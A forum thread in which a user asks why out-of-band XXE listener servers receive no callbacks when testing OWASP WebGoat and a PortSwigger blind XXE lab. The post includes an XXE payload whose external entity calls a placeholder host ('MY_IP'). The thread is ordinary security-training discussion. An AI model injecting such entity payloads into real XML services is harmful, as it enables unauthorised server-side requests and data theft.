Jump to content

Trouble testing xxe server


Cherry_Sec
 Share

Recommended Posts

I want to test If servers like xxe-ftp-server or xxeserv can work to receive http requests and transfer dtds. However I have so far been unable to get either to work when testing on things like OWASP WebGoat or the blind xxe lab by PortSwigger. For example: on the PortSwigger xxe lab, I intercept the correct XML POST request and add

<!DOCTYPE stockCheck [
  <!ENTITY ping SYSTEM "http://MY_IP:80/"> 
]>

and then replace the content of the productID tag with &ping; (like it states in the solution). Using either of the mentioned servers results in the same thing, the PortSwigger server responding with 'parsing error' while my xxe servers don't pickup on any traffic at all. If this is just because of how the servers I'm attacking are set up, then can anyone suggest anything i could test against that would allow me to get a result from my xxe servers.

Link to comment
Share on other sites

Ah, sorry I just realized I didn't word that well. Basically im asking if anyone could either give me an idea as to why my xxe servers are not picking anything up (like is there something wrong with my inserted dtd) or, if the problem is simply beacause of how OWASP WebGoat and the blind xxe lab are set up, could anyone suggest something I could test xxe on that would allow me to use the mentioned xxe servers.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...